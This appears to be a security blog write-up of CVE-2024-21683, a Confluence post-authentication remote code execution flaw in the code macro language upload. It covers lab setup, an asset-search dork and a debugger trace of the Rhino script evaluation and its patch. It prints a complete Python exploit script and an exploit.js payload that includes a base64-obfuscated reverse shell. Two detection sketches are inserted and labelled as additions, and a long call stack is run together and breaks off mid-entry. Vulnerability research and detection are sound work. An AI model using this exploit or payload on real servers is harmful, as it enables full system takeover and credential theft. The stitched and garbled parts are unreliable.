Confluence Post-Authentication RCE (CVE-2024-21683)

admin, 2025-01-20 12:40:04

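About Confluence

Confluence is collaboration software developed by Atlassian, mainly used within teams for

Confluence is typically used in enterprise environments to improve team productivity and communication.

Vulnerability overview

Confluence is team collaboration software developed by Atlassian that helps team members share knowledge, collaborate on documents and manage projects.

Confluence allows an authenticated attacker to execute arbitrary code, which can lead to full system takeover, malware deployment, system configuration changes and theft of login credentials.

Affected versions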

● 8.9.0

● 8.8.0 to 8.8.1

● 8.7.1 to 8.7.2

● 8.6.0 to 8.6.2

● 8.5.0 to 8.5.8 (LTS)

● 8.4.0 to 8.4.5

● 8.3.0 to 8.3.4

● 8.2.0 to 8.2.3

● 8.1.0 to 8.1.4

● 8.0.0 to 8.0.4

● 7.20.0 to 7.20.3

● 7.19.0 to 7.19.21 (LTS)

Asset-mapping platform dork

app="ATLASSIAN-Confluence"

Environment setup

This article uses vulhub's CVE-2023-22527 environment. The docker-compose file vulhub provides does not expose remote debugging, so modify it. First add a port mapping:

```yaml
version: '2'
services:
  web:
    image: vulhub/confluence:8.5.3
    ports:
      - "8090:8090"
      - "5050:5050"
    depends_on:
      - db
  db:
    image: postgres:15.4-alpine
    environment:
    - POSTGRES_PASSWORD=postgres
    - POSTGRES_DB=confluence
```

```bash
docker-compose up -d
# After the container starts, enter it and run:
sed -i '/export CATALINA_OPTS/iCATALINA_OPTS="-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5050 ${CATALINA_OPTS}"' /opt/atlassian/confluence/bin/setenv.sh
# Then run:
docker-compose restart
# See vulhub for the detailed installation steps; once installation is complete the target is ready.
# Next, download the 8.5.3 zip package from
# https://www.atlassian.com/zh/software/confluence/download-archives
# unpack it and open it in IDEA.
```

Add all of these as libraries, then configure a remote debug session.

The debugging environment is now set up as well.

Reproducing the vulnerability

For a one-shot script, see:

https://github.com/W01fh4cker/CVE-2024-21683-RCE

```
python .\CVE-2024-21683.py -u http://127.0.0.1:8090/ -au admin -ap admin -f exploit.js -n test
```

```python
import argparse
import os
import requests
from bs4 import BeautifulSoup


def GeyAltToken(url, proxy, session):
    # Fetch the XSRF token (atlassian-token meta tag) from the code macro admin page.
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
    }
    alttoken_url = f"{url}/admin/plugins/newcode/configure.action"
    resp = session.get(url=alttoken_url, headers=headers, verify=False, proxies=proxy, timeout=20)
    if "atlassian-token" in resp.text:
        soup = BeautifulSoup(resp.text, 'html.parser')
        meta_tag = soup.find('meta', {'id': 'atlassian-token', 'name': 'atlassian-token'})
        if meta_tag:
            content_value = meta_tag.get('content')
            return content_value
        else:
            print("Meta tag not found")


def LoginAsAdministrator(session, url, proxy, username, password):
    # Log in with an account that belongs to the Administrators group.
    login_url = url + "/dologin.action"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    data = f"os_username={username}&os_password={password}&login=%E7%99%BB%E5%BD%95&os_destination=%2F"
    session.post(url=login_url, headers=headers, data=data, proxies=proxy, verify=False, timeout=20)


def DoAuthenticate(session, url, proxy, password, alt_token):
    # Re-enter the password to obtain an elevated (WebSudo) administrator session.
    login_url = url + "/doauthenticate.action"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    data = f"atl_token={alt_token}&password={password}&authenticate=%E7%A1%AE%E8%AE%A4&destination=/admin/viewgeneralconfig.action"
    session.post(url=login_url, headers=headers, data=data, proxies=proxy, verify=False, timeout=20)


def UploadEvilJsFile(session, url, proxy, jsFilename, jsFileContent, alt_token):
    # Upload the JS file as a new code macro language definition.
    url = f"{url}/admin/plugins/newcode/addlanguage.action"
    data = {
        "atl_token": alt_token,
        "newLanguageName": "test"
    }
    files = {
        "languageFile": (jsFilename, jsFileContent, "text/javascript")
    }
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
    }
    session.post(url, headers=headers, data=data, files=files, verify=False, proxies=proxy, timeout=20)


def ParseArgs():
    parser = argparse.ArgumentParser(description="CVE-2024-21683-RCE")
    parser.add_argument("-u", "--url", type=str, help="target url to check, eg: http://192.168.198.1:8090", required=True)
    parser.add_argument("-p", "--proxy", type=str, default="http://127.0.0.1:8083", help="proxy url, eg: http://127.0.0.1:8083", required=False)
    parser.add_argument("-au", "--admin-username", type=str, help="The username of the user who is in the Administrators group", required=True)
    parser.add_argument("-ap", "--admin-password", type=str, help="The password of the user who is in the Administrators group", required=True)
    parser.add_argument("-f", "--file", type=str, help="exploit file", default="exploit.js", required=True)
    parser.add_argument("-n", "--name", type=str, help="newLanguageName", default="test", required=True)
    return parser.parse_args()


if __name__ == '__main__':
    args = ParseArgs()
    # The original applied the proxy whether or not -p was passed, so this was changed
    proxy = {}
    session = requests.session()
    jsfn = os.path.basename(args.file)
    jsfc = open(args.file, "r", encoding="utf-8").read()
    LoginAsAdministrator(session, args.url.strip("/"), proxy, args.admin_username, args.admin_password)
    alt_token = GeyAltToken(args.url.strip("/"), proxy, session)
    DoAuthenticate(session, args.url.strip("/"), proxy, args.admin_password, alt_token)
    UploadEvilJsFile(session, args.url.strip("/"), proxy, jsfn, jsfc, alt_token)
```

exploit.js

```javascript
// new java.lang.ProcessBuilder["(java.lang.String[])"](["calc.exe"]).start()
// The target runs in docker, so a file is created here as the demonstration
new java.lang.ProcessBuilder["(java.lang.String[])"](["bash", "-c", "touch /tmp/succ"]).start()
// Reverse shell variant:
new java.lang.ProcessBuilder["(java.lang.String[])"](["bash", "-c", "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvMTEyMjMgMD4mMQ==}|{base64,-d}|{bash,-i}"]).start();
```

To do it manually: log in to the admin console -- Site administration -- Configure Code Macro

Upload the JS above. Ignore whatever the front end displays; the code has actually been executed.
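The request sequence the script above automates leaves a recognisable trail in the web access log. The following detection sketch is an added example, not part of the original article or the linked repository; the routes are the ones the script calls, while the log layout (client, user, [timestamp], "request", status), the 30-second window and the sample lines are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Routes taken from the reproduction script above.
UPLOAD_ROUTE = "/admin/plugins/newcode/addlanguage.action"
CHAIN_ROUTES = ("/dologin.action", "/doauthenticate.action")

# Assumed log layout: client user [timestamp] "METHOD target HTTP/x" status
LINE_RE = re.compile(
    r'^(?P<client>\S+) (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed sample lines, not taken from a real system.
SAMPLE_LOG = """\
10.0.0.5 alice [20/Jan/2025:12:00:01 +0000] "GET /dashboard.action HTTP/1.1" 200
10.0.0.9 - [20/Jan/2025:12:01:10 +0000] "POST /dologin.action HTTP/1.1" 302
10.0.0.9 admin [20/Jan/2025:12:01:10 +0000] "GET /admin/plugins/newcode/configure.action HTTP/1.1" 200
10.0.0.9 admin [20/Jan/2025:12:01:11 +0000] "POST /doauthenticate.action HTTP/1.1" 302
10.0.0.9 admin [20/Jan/2025:12:01:11 +0000] "POST /admin/plugins/newcode/addlanguage.action HTTP/1.1" 200
this line is malformed and must be skipped
10.0.0.7 bob [20/Jan/2025:13:30:00 +0000] "GET /admin/plugins/newcode/configure.action HTTP/1.1" 200
10.0.0.7 bob [20/Jan/2025:13:42:30 +0000] "POST /wiki/admin/plugins/newcode/addlanguage.action?x=1 HTTP/1.1" 200
"""


def route_of(target):
    """Drop the query string and any ;jsessionid path parameter."""
    return target.split("?", 1)[0].split(";", 1)[0]


def detect_language_uploads(log_text, window=timedelta(seconds=30)):
    """Report every POST to the code macro language upload route.

    An upload is rated "high" when the same client also POSTed the login and
    the administrator re-authentication step within `window` beforehand, which
    is the back-to-back pattern a script produces. Any other upload is rated
    "review": adding a code macro language is a rare administrative action.
    Lines are assumed to be in chronological order.
    """
    last_seen = {}   # (client, chain route) -> time of the most recent POST
    findings = []
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw)
        if not m or m["method"] != "POST":
            continue
        try:
            ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        except ValueError:
            continue  # unparseable timestamp: skip rather than guess
        client, route = m["client"], route_of(m["target"])
        for step in CHAIN_ROUTES:
            # endswith() tolerates a context path such as /wiki or /confluence
            if route.endswith(step):
                last_seen[(client, step)] = ts
        if route.endswith(UPLOAD_ROUTE):
            scripted = all(
                (client, step) in last_seen
                and ts - last_seen[(client, step)] <= window
                for step in CHAIN_ROUTES
            )
            findings.append({
                "time": ts.isoformat(),
                "client": client,
                "user": m["user"],
                "route": route,
                "status": int(m["status"]),
                "severity": "high" if scripted else "review",
            })
    return findings


if __name__ == "__main__":
    for finding in detect_language_uploads(SAMPLE_LOG):
        print(finding)
```
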

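Vulnerability analysis

The JAR files in a Confluence release carry version numbers in their names, so a direct diff in IDEA does not line the old and new files up. Write a script to strip the version numbers:

```python
import os
import shutil


def main():
    confluence_lib_path = r"D:\atlassian-confluence-8.5.3\atlassian-confluence-8.5.3\confluence\WEB-INF"
    lib_path = rf"{confluence_lib_path}\atlassian-bundled-plugins"
    # Output directory: WEB-INF\no_version_atlassian-bundled-plugins
    no_version_lib_path = rf"{confluence_lib_path}\no_version_" + lib_path.split('\\')[-1]
    if not os.path.exists(no_version_lib_path):
        os.mkdir(no_version_lib_path)
    for root, dirs, files in os.walk(lib_path):
        for old_filename in files:
            # e.g. newcode-macro-plugin-17.19.3.jar -> version part is "17.19.3.jar"
            version = old_filename.split('-')[-1]
            # Drop the version part and re-append the file extension
            new_filename = old_filename.replace(f'-{version}', '') + '.' + old_filename.split('.')[-1]
            shutil.copyfile(rf'{lib_path}\{old_filename}', rf'{no_version_lib_path}\{new_filename}')


if __name__ == '__main__':
    main()
```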

Run the same script against the new version as well, then compare the code in IDEA. According to the official disclosure:

[CONFSERVER-95832] RCE (Remote Code Execution) in Confluence Data Center and Server - Create and track feature requests for Atlassian products.

https://jira.atlassian.com/browse/CONFSERVER-95832

From this, the route is admin/plugins/newcode/addlanguage.action and the JAR is newcode-macro-plugin-17.19.3.jar.

Set a breakpoint at com.atlassian.confluence.ext.code.languages.impl.RhinoLanguageParser#parseLanguage.

Here the uploaded JS is concatenated into a wrapper script. The result is:

```javascript
var brushName;
var brushAliases;
var SyntaxHighlighter = function() {
    var sh = {
        brushes : {},
        readBrushes : function () {
            //Find all brushes
            for (var brush in SyntaxHighlighter.brushes) {
                brushAliases = SyntaxHighlighter.brushes[brush].aliases;
                brushName = "" + brush;
            }
        }
    }
    sh.Highlighter = function(){};
    return sh;
}();
new java.lang.ProcessBuilder["(java.lang.String[])"](["bash", "-c","touch /tmp/succ"]).start()
SyntaxHighlighter.readBrushes();
```

Follow execution into org.mozilla.javascript.Context#compileImpl.

The JS is parsed into an AST.

Continue down and step in here.

The JS is compiled to bytecode. Keep stepping until org.mozilla.javascript.optimizer.Codegen#createScriptObject.

The class that was just generated is instantiated.

Finally, execution reaches org.mozilla.javascript.Context#evaluateString, which invokes it.

The patch's fix is Scriptable scope = cx.initSafeStandardObjects((ScriptableObject)null, true); initSafeStandardObjects restricts code execution by creating the standard objects without the dangerous functionality, that is, without the objects that give scripts direct access to Java classes.
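Because the patched scope leaves out the objects that expose Java classes, a language file that references them in executable code deserves a review. The triage sketch below is an added example, not code from the article or from Atlassian: the list of Rhino Java-bridge globals and the flagging of eval/Function are this example's assumptions, both sample files are constructed, and the flagged line reuses the article's own touch /tmp/succ demo.

```python
import re

# Globals that an unrestricted Rhino scope provides for reaching Java classes
# (assumption of this example: the names initSafeStandardObjects leaves out).
JAVA_BRIDGE = {"java", "javax", "org", "com", "edu", "net", "Packages",
               "getClass", "JavaAdapter", "JavaImporter"}
DYNAMIC_CODE = {"eval", "Function"}          # can hide identifiers in strings
REGEX_PRECEDERS = set("(,=:[!&|?{};+-*%<>~^")  # '/' after these opens a regex
# Bare identifiers only: a name that follows '.' is a property, not a global.
BARE_IDENT = re.compile(r"(?<![\w$.])[A-Za-z_$][\w$]*")

# Constructed brush in the SyntaxHighlighter style: "java" occurs only as data.
CLEAN_BRUSH = r'''// Demo brush; java is mentioned here only in a comment
SyntaxHighlighter.brushes.Demo = function() {
    var keywords = 'abstract class extends java package';
    this.regexList = [
        { regex: /\/\/.*$/gm, css: 'comments' },      /* line comments */
        { regex: /"(?:[^"\\]|\\.)*"/g, css: 'string' },
        { regex: new RegExp(this.getKeywords(keywords), 'gm'), css: 'keyword' }
    ];
};
SyntaxHighlighter.brushes.Demo.aliases = ['demo', 'java'];
'''

# Constructed file whose second line is the article's own demo statement.
SUSPECT_FILE = r'''var ratio = 10 / 2 / 1;  // java in a comment is ignored
new java.lang.ProcessBuilder["(java.lang.String[])"](["bash", "-c","touch /tmp/succ"]).start()
'''


def blank_non_code(src):
    """Replace comments, string literals and regex literals with spaces
    (newlines kept) so that identifiers are matched in executable code only."""
    out, i, n, prev = [], 0, len(src), ""   # prev: last significant code char
    while i < n:
        c, nxt = src[i], src[i + 1:i + 2]
        if c == "/" and nxt == "/":                      # line comment
            j = src.find("\n", i)
            j = n if j == -1 else j
        elif c == "/" and nxt == "*":                    # block comment
            j = src.find("*/", i + 2)
            j = n if j == -1 else j + 2
        elif c in "\"'`":                                # string literal
            j = i + 1
            while j < n and src[j] != c:
                j += 2 if src[j] == "\\" else 1
            j, prev = min(j + 1, n), "x"                 # a literal is a value
        elif c == "/" and (prev == "" or prev in REGEX_PRECEDERS):
            j, in_class = i + 1, False                   # regex literal
            while j < n and src[j] != "\n" and (in_class or src[j] != "/"):
                if src[j] == "\\":
                    j += 1                               # skip escaped char
                elif src[j] == "[":
                    in_class = True
                elif src[j] == "]":
                    in_class = False
                j += 1
            j, prev = min(j + 1, n), "x"
        else:                                            # ordinary code
            out.append(c)
            if not c.isspace():
                prev = c
            i += 1
            continue
        out.append("".join(ch if ch == "\n" else " " for ch in src[i:j]))
        i = j
    return "".join(out)


def scan_language_file(src):
    """Return (line, category, identifier) for each suspicious bare identifier."""
    findings = []
    for lineno, line in enumerate(blank_non_code(src).splitlines(), 1):
        for m in BARE_IDENT.finditer(line):
            name = m.group(0)
            if name in JAVA_BRIDGE:
                findings.append((lineno, "java-bridge", name))
            elif name in DYNAMIC_CODE:
                findings.append((lineno, "dynamic-code", name))
    return findings


if __name__ == "__main__":
    print(scan_language_file(CLEAN_BRUSH))
    print(scan_language_file(SUSPECT_FILE))
```

This is a heuristic review aid for language files already present on a server; the safe scope in the patched release is what actually removes the capability.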

The full call stack is:

IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:82, TokenBasedAuthenticationFilter (com.atlassian.pats.web.filter), TokenBasedAuthenticationFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:81, AccessTokenFilter (com.atlassian.oauth2.provider.core.web), AccessTokenFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:56, PrettyUrlsCombinedMatchDispatcherFilter (com.atlassian.prettyurls.filter), PrettyUrlsCombinedMatchDispatcherFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javadoFilter:56, ServletFilterModuleContainerFilter (com.atlassian.plugin.servlet.filter), ServletFilterModuleContainerFilter.javadoFilter:44, ServletFilterModuleContainerFilter (com.atlassian.plugin.servlet.filter), ServletFilterModuleContainerFilter.javadoFilter:50, JohnsonServletFilterModuleContainerFilter (com.atlassian.johnson.plugin.servlet.filter), 
JohnsonServletFilterModuleContainerFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:57, ClusterHeaderFilter (com.atlassian.confluence.util), ClusterHeaderFilter.javadoFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilterInternal:156, OpenSessionInViewFilter (org.springframework.orm.hibernate5.support), OpenSessionInViewFilter.javadoFilterInternal:39, ConfluenceOpenSessionInViewFilter (com.atlassian.confluence.web.filter), ConfluenceOpenSessionInViewFilter.javadoFilter:117, OncePerRequestFilter (org.springframework.web.filter), OncePerRequestFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:24, ConfluenceErrorFilter (com.atlassian.confluence.util), ConfluenceErrorFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:104, ProfilingFilter (com.atlassian.util.profiling.filters), ProfilingFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:39, RequestTimeThreadLocalFilter (com.atlassian.confluence.core.datetime), RequestTimeThreadLocalFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), 
ApplicationFilterChain.javadoFilter:31, AbstractCachingFilter (com.atlassian.core.filters.cache), AbstractCachingFilter.javadoFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:39, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:70, DisableBasicAuthFilter (com.atlassian.plugins.authentication.impl.basicauth.filter), DisableBasicAuthFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:26, DefaultAnalyticsFilter (com.atlassian.analytics.client.filter), DefaultAnalyticsFilter.javadoFilter:33, AbstractHttpFilter (com.atlassian.analytics.client.filter), AbstractHttpFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:37, JwtAuthFilter (com.atlassian.jwt.internal.servlet), JwtAuthFilter.javadoFilter:62, 
DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:46, AbstractThreadNamingFilter (com.atlassian.troubleshooting.thready.filter), AbstractThreadNamingFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:58, HttpRequestStatsFilter (com.atlassian.confluence.web.filter), HttpRequestStatsFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilterInternal:114, GzipFilter (com.atlassian.gzipfilter), GzipFilter.javadoFilter:91, GzipFilter (com.atlassian.gzipfilter), GzipFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 
(com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:47, ConfluenceTimingFilter (com.atlassian.confluence.web.filter), ConfluenceTimingFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:56, PrettyUrlsCombinedMatchDispatcherFilter (com.atlassian.prettyurls.filter), PrettyUrlsCombinedMatchDispatcherFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:71, WebdavRequestForwardFilter (com.atlassian.confluence.extra.webdav.servlet.filter), WebdavRequestForwardFilter.javadoFilter:29, AbstractHttpFilter (com.atlassian.confluence.extra.webdav.servlet.filter), AbstractHttpFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javadoFilter:56, ServletFilterModuleContainerFilter (com.atlassian.plugin.servlet.filter), ServletFilterModuleContainerFilter.javadoFilter:44, ServletFilterModuleContainerFilter (com.atlassian.plugin.servlet.filter), ServletFilterModuleContainerFilter.javadoFilter:50, JohnsonServletFilterModuleContainerFilter (com.atlassian.johnson.plugin.servlet.filter), 
JohnsonServletFilterModuleContainerFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:36, MobileAppRequestFilter (com.atlassian.confluence.util), MobileAppRequestFilter.javadoFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:59, IgnoreWebAsyncManagerFilter (com.atlassian.confluence.internal.web.filter.spring), IgnoreWebAsyncManagerFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:51, RequestParamValidationFilter (com.atlassian.confluence.web.filter.validateparam), RequestParamValidationFilter.javadoFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:39, TranslationModeFilter (com.atlassian.confluence.web.filter), TranslationModeFilter.javadoFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:39, LanguageExtractionFilter (com.atlassian.confluence.web.filter), LanguageExtractionFilter.javadoFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), 
ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javalambda$doFilter$3:44, VCacheRequestContextFilter (com.atlassian.confluence.impl.vcache), VCacheRequestContextFilter.javaperform:-11655779650 (com.atlassian.confluence.impl.vcache.VCacheRequestContextFilter$$Lambda$3822), Unknown SourcedoInRequestContextInternal:84, VCacheRequestContextManager (com.atlassian.confluence.impl.vcache), VCacheRequestContextManager.javadoInRequestContext:68, VCacheRequestContextManager (com.atlassian.confluence.impl.vcache), VCacheRequestContextManager.javadoFilter:43, VCacheRequestContextFilter (com.atlassian.confluence.impl.vcache), VCacheRequestContextFilter.javadoFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:32, LoggingContextFilter (com.atlassian.confluence.util), LoggingContextFilter.javadoFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:67, RequestCacheThreadLocalFilter (com.atlassian.confluence.util), RequestCacheThreadLocalFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:87, TracingFilter (brave.servlet), TracingFilter.javadoFilter:49, ZipkinTracingFilter (com.atlassian.confluence.web.filter), ZipkinTracingFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), 
ApplicationFilterChain.javadoFilter:25, ResponseOutputStreamFilter (com.atlassian.confluence.web.filter), ResponseOutputStreamFilter.javadoFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:59, AbstractJohnsonFilter (com.atlassian.johnson.filters), AbstractJohnsonFilter.javadoFilter:32, ConfluenceJohnsonFilter (com.atlassian.confluence.web), ConfluenceJohnsonFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilterInternal:35, ConfluenceEncodingFilter (com.atlassian.confluence.setup), ConfluenceEncodingFilter.javadoFilter:44, AbstractStaticResourceAwareFilter (com.atlassian.confluence.web.filter), AbstractStaticResourceAwareFilter.javadoFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:25, ThreadLocalCacheFilter (com.atlassian.confluence.web.filter), ThreadLocalCacheFilter.javainternalDoFilter:178, 